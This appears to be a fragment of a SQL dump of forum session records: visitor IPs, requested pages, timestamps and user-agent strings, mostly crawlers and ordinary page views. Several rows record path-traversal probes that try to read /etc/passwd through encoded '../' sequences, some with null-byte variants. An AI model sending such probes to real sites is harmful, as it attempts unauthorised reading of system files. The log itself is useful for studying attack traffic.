('516c03fdabf7575449323333f1a11d43', 0, '2a02:598:2::106', '0cc0caf3518033fa9fc664abfc960d4e', 1466764272, '/register.php?', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('011e17710b9cc9bebb6a70db3778b35d', 0, '66.249.64.173', 'b74d0bcf4e50a120a01910c89bfe2d08', 1466770907, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8f80104c16219f7f9bcd164a3cbc427a', 0, '62.210.14.143', 'df1a0ad592119dc83312b34bc8650cb0', 1466777927, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ce560a6e5d8ec7da4ee315b1b767f6b7', 0, '79.106.109.188', 'f482136b162e83abc0603c5617a84ffc', 1466778276, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6ee8e7df8ce025e5287d1d7050a6e8d1', 0, '66.249.79.157', '1f427e4d6723ae757ae768f9466ee93a', 1466788464, '/index.php?langid=2', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('408b21fc2c02981800bcf385f9d2ee44', 0, '66.249.79.171', '1f427e4d6723ae757ae768f9466ee93a', 1466826599, '/showthread.php?p=2959', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3f3595f4a3c730badf1b8eb276a5e5da', 0, '172.68.11.247', '5d86f4a13739f5da0c4df057c7df0088', 1466782576, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0bd7f94ce2f2f6b42b29f29c0b1d2b6d', 0, '2a02:598:a::78:', '138d9b1cbab3821f54bf5d5f7ceb11cd', 1471264232, '/register.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4572b454d798809da60db344f1de9b8d', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466791173, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('b483e8dd844f81b8d01e86294e32d8b4', 0, '66.249.79.185', '1f427e4d6723ae757ae768f9466ee93a', 1469397153, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5c954e4233ea7476446f3c3854499f50', 0, '207.46.13.189', '5e207e311e22cdc3b2095126a922fa93', 1466792361, '/index.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('eddd4666c641e6691040467f4906e30d', 0, '173.234.159.236', 'fde51280d584d102e831b227d554cd1b', 1466792946, '/member.php?u=287', 'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fb8fe211623f3b376f176785459bf1e2', 0, '187.158.110.214', '369cb9e6b147b026b3158434d7fd38c8', 1467051607, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cd2aed1689db002fc09aa6bf446a6cfc', 0, '66.249.79.150', '1f427e4d6723ae757ae768f9466ee93a', 1466805615, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e9e24f6a1b56b91cc6816608c1363cf6', 0, '66.249.79.164', '42382f72607791905ff50694f07a1e96', 1466942867, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e8dd3267b13915fddca7d4a1711970b1', 0, '46.10.49.153', 'c5a73cb6054a44398af7de507c41862b', 1466818183, '/register.php', 'Mozilla/5.0 (Linux; Android 5.0.2; SM-A500FU Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Ch', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c2a14c7f696b5e88a9961e62797311d2', 0, '40.77.167.37', 'c5490a5a8e1813ac25cf9e19091dcb85', 1468746793, '/archive/index.php/f-36.html', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('5d6bc75d72d8168cc075ede0846dbb61', 0, '207.46.13.132', '5e207e311e22cdc3b2095126a922fa93', 1466818195, '/search.php?searchthreadid=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cbe006707c091a4cd63dbc78b4768cf2', 0, '157.55.39.95', '23f3103f44bc3badcba53554e5e4cb6d', 1467195686, '/showthread.php?p=3046', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('73e1db3c6972cb06f5764f62571b1ce7', 0, '54.166.158.215', '6bfca988c70a2bc59d58059aee33c2e2', 1466818965, '/index.php', 'Mozilla/5.0 (compatible; linkdexbot/2.2; +http://www.linkdex.com/bots/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('193500389bcbf164c088e383d955331d', 0, '62.235.9.220', 'bf17c0c297e21ba9414513db5d78ce7c', 1466818996, '/showthread.php?p=3045', 'Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('135ac1348dc48fec928c39b6fef6e711', 0, '88.244.140.192', '69e88679ab9ae9d56fb00d34abaff49d', 1466829577, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bc54de17e77be563f9a09dd04e180b6f', 0, '157.55.39.136', '23f3103f44bc3badcba53554e5e4cb6d', 1466832732, '/printthread.php?t=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('94d8d9528887fbd24eee782d97abfae4', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466834072, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('40535f7393daf38570073c372de16b40', 0, '172.68.10.240', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475258142, '/misc.php?do=whoposted&t=2236', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('833b2316c526512110ed8d6bc2b5ff01', 0, '207.46.13.68', '5e207e311e22cdc3b2095126a922fa93', 1466835019, '/showthread.php?p=3017', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('79a78e1ad1adcd171cdad8f227d7e944', 0, '5.249.139.221', 'd375e6b840b9ced7b9bf176a30b22064', 1466839984, '/showthread.php?t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3667bba824f3c02004df9068fb2d02e1', 0, '78.95.113.2', '1c546fbf3e1c809a6445ea86d324aa66', 1466843329, '/showthread.php?t=2489', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mob', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('69097988ef317e4682698de74ededba4', 0, '39.40.229.82', '4907d16509b9444dc2c5be139b709fa6', 1466845007, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1d60d64b2a65dee40f7b71fe2b7ece64', 0, '207.46.13.43', '5e207e311e22cdc3b2095126a922fa93', 1466845053, '/showthread.php?p=2697', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('693ad777eb1a2a8370ce5e21c2068511', 0, '172.68.10.197', 'c3abfc3f2822f6105c072f53739053f4', 1466849396, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('18b53b23ae059ad4b7cfaff372b42325', 0, '62.210.14.143', '78bf526b5685e8598a7770ba25cde3a4', 1466851472, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f6d585fe8039495cdade226e9aea4bac', 0, '157.55.39.81', '23f3103f44bc3badcba53554e5e4cb6d', 1474951959, '/showthread.php?p=2800&mode=threaded', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ac213adb85d52333b95db0af6b0176ca', 0, '119.130.186.143', '24ff57c72763ec940abfe379772c2431', 1466859712, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b7cbeeab9010aa8fdcc9e66b222c10c5', 0, '101.199.112.53', 'e956bf575b7463cd105dd791d5dfa5ff', 1466859872, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Versio', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a8a9d2626c1ca7ec15b6d656e486f7fa', 0, '2601:18a:c200:7', '327d36c11e972a923ec6ff5b60ee6dce', 1466863522, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a26b8ca7a48fe3eef652f6af92bcdd04', 0, '92.51.133.93', '7ae5bffb3f43407275c5f1bb4afc9af3', 1466864505, '/showthread.php?t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a6384fb0543fcba82af3f150b3e56505', 0, '217.69.133.21', 'adec92f43af45575d1a28ddcb0eea331', 1466868759, '/showthread.php?p=2697', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('31aadfc3642ea6cc2ef4cfd2c767c23a', 0, '79.109.26.63', '1fb4082b7da2c5ae7744901030b90676', 1473525907, '/forumdisplay.php?f=37', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('48d4e253d6aca02fdb5ecbc562d1f419', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466876863, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('3e90f9e802efcff598534f471fc2b70d', 0, '160.177.188.60', '97a3df17f019933c9e3f04b2982d71c8', 1474235832, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9f8da764248c868a1cedbba6f5004260', 0, '172.68.29.184', '5e3ce9ce76621b3ed7d18939a6c1e83a', 1466884696, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('68002d9226bd3573b5e00167cbbfeaba', 0, '2a02:598:a::78:', 'aa610fca3fb0f163a466cc6b4fe11d6a', 1466885136, '/online.php?', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('53eca3c23c4a8338a3fd793c1aa95645', 0, '217.69.133.191', 'adec92f43af45575d1a28ddcb0eea331', 1466885373, '/archive/index.php/t-1151.html', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('99ad6ec798bdbc3ba248f462b9d0e422', 0, '217.69.133.249', 'adec92f43af45575d1a28ddcb0eea331', 1466885375, '/index.php', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('df0d2f1f7226f753301bf9e3aef68211', 0, '2a02:598:2::167', '29a58a403d7f9f919c23a663d8800079', 1475218712, '/memberlist.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('db4b2b2304b0503db2a266932a61b2c4', 0, '95.13.15.208', '8010baf948a826cb8ca9200e4e9210bd', 1466899196, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1bc827ecc1b01f34add83ab0a407c7b9', 0, '98.126.160.138', 'cce94c745c5a7b8f4a9267cc00d5f366', 1466905823, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8b90b8c86aed829884d88bd43583f51c', 0, '2a02:598:a::79:', '211c8d5052b2b345b76cec7f9b63bf18', 1472262746, '/faq.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2d31b046d5d244f6213c65586def37e9', 0, '37.187.72.206', '49242ab98cc09ac1c22d6b8436a82e63', 1466919607, '/showthread.php?t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a3e722aa71b39d5142367cda4142e6f6', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466919839, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('266abf2abe633694f7d69a0d204d7634', 0, '172.68.10.251', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475239132, '/forumdisplay.php?f=35&order=desc', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('daf9e8cd40e36b6ef93004c3087dc938', 0, '2a02:2b88:2:1::', 'b0e0f77d769f85744d0ba5ada929fe74', 1466925923, '/memberlist.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c4c042431e3ac04051fa68d6d34d5001', 0, '195.122.150.130', '8ab6ef13cdf1db8b134cebff948801a0', 1466932225, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('80f33a918a784357e2a307d8fb86d13f', 0, '212.227.28.19', '34c281abaf5b07892791958fe546252d', 1466932366, '/showthread.php?t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('456d09c626d82c19f18b6ca938a1b2c9', 0, '68.13.99.108', 'ebe1200ef1f42535f7c698fb53e9fcd4', 1466934977, '/memberlist.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('42c09a8b2480ff0bae0eae78f5c9c7f6', 386, '88.150.157.103', '249446ca78ee811833f4b778a91190a9', 1466938815, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('9607439117b5da3162a209858340a719', 0, '172.68.10.253', '5c3a29722b6b217bfb717187fec00ee6', 1466940107, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e53a1fc2c7168e3e59abf3a21e4d422a', 0, '172.68.11.237', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475337499, '/showthread.php?t=2384', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e71a966a50e1bb9adae1e3194fbea970', 0, '172.68.10.236', '9c293826c51347a170cd040ce7576a9e', 1466944647, '/showthread.php?t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('23a6607e31b9b9d08ea6376c18c918f1', 0, '86.187.169.145', 'eefbbe0a431b1d8b52db414ab6b76f84', 1466946476, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('af3a755e9bbb16d30f32e65de774b231', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466962785, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('4ca1d78514153c3770d7c9a9b9abd7e8', 0, '2a02:598:a::78:', '3c00b2b12d9151835ef09f6f5e9091ac', 1475210728, '/archive/index.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('3939ada16c9ea82aba6014366f1e7d35', 0, '37.47.234.4', '101e3899e65595274d84e91782544ffb', 1466971747, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1b8f4ab20d4643dd4f64456569094a8c', 0, '5.79.86.129', 'eff5597a8d54bc011816d980d90887ad', 1466973616, '/register.php?', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d0e60eb674060e6d6c4c6319f7fa7170', 0, '178.33.32.47', '337796ac76608bf17cd8f288734de4e5', 1466985262, '/showthread.php?t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7609ba0a4f4765f441ea45cf9beb1ba1', 0, '78.88.29.107', '43d6b0a26927101c3663cc2cc2275c19', 1466989821, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2991f2d53f7a6eee74f11c3df7a15e2a', 0, '2a02:598:2::170', '503104cea30a00ebbe0bde5f8b090b79', 1471464981, '/login.php?do=lostpw', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d749017a0f918e6efe87f1ac3c66599d', 0, '31.182.84.15', 'c033ff80d336b314cd5bc9094dd8360c', 1466994228, '/register.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8585d7fbaf3e0048ca5fc1931ba2bc7c', 0, '37.241.254.85', '7e12cb9a2aaeb73d22f292cdbeb2d993', 1466995861, '/index.php?', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Ver', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2154aba5db9d7a1ccbadf595487b8322', 0, '83.10.215.167', 'dce6a21b490bd9d02873fa858f3bb5f6', 1467004721, '/index.php', 'Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.18', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('353e278785ebaf265bcd7806563195f3', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467005474, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('aaa96f95a88a290c5535b7e7adf8e2a8', 0, '172.68.11.243', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475303805, '/showthread.php?p=2018', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c3afc8582985bd30f353e539bc6a5a89', 0, '178.162.196.87', '0bf4a26161a226e40d31e48779e8605f', 1467010466, '/forumdisplay.php?f=37', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0786d0075a07360f9a23deb1b9bff545', 0, '120.56.101.43', 'e94da1b442ca335fb1180e7719c9f8ae', 1467016872, '/faq.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('62fecd014e3f6c6face9ec433adecc0d', 0, '172.68.10.239', 'e696c8cfbff637411d7814bdd9fd2e86', 1467017931, '/index.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d9b6795d20d9cde96748f269dda690b0', 0, '77.79.235.84', '8fce5a0e27f98f20d7481d5d75d8959a', 1467022366, '/memberlist.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4bfb90eacf8bd8caa572ee0865465436', 0, '172.68.11.236', '54fe18c99e79a2671eb7a5764ccbbb4c', 1471493383, '/member.php?u=278', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('76aaa2a48f1a866b8592d074c359f19e', 0, '172.68.10.253', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1467034195, '/misc.php?do=whoposted&t=2465', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ccecd7f697db1263ce5a0b63271c9818', 0, '172.68.11.247', '54fe18c99e79a2671eb7a5764ccbbb4c', 1474936867, '/search.php?do=finduser&userid=1&searchthreadid=1196', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9eb5c706df9124a639c4c6ea6c705fb4', 0, '5.196.132.93', '8125caee055dfa965032be13a93cc65b', 1467044834, '/register.php?', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('18abd8a6250fbbc9f3489d57001462ab', 0, '2a02:8071:682:2', '519d43fb197294e35cd15366667b304a', 1467047307, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('db76c2a0b1ee6c72f3ab78c552930386', 0, '172.68.11.198', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475321219, '/showthread.php?t=2390', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4b7fa12daeda0410d3420d60633518a7', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467048330, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('ce2bcd9049233886620465a6f6e398a6', 0, '172.68.11.204', '54fe18c99e79a2671eb7a5764ccbbb4c', 1470818957, '/member.php?u=315', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5c160c483b912a667c2ca633e5aa43e4', 0, '172.68.10.252', '54fe18c99e79a2671eb7a5764ccbbb4c', 1470824580, '/showthread.php?mode=hybrid&t=2314', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0b423863b78641ae73742191149da073', 0, '172.68.11.249', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1467062856, '/showthread.php?t=2330', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b6594f47e7be012d37a8b5a1db2ab8f0', 0, '172.68.11.253', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1472896224, '/archive/index.php/t-2391.html', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('8ef4a6199e37258e2f707c57590f2e28', 0, '39.40.226.91', '65b12f7a7afe1c9b42ac246beaf61560', 1467072670, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.3.4000 Chrome', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f1e57460ffe6b14e017538c3061cc066', 0, '172.68.10.254', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475241266, '/showthread.php?t=1657', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a895b7c10c6e7e70b6eef34cbf45861a', 0, '172.68.10.242', '54fe18c99e79a2671eb7a5764ccbbb4c', 1473740337, '/showthread.php?p=1595', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
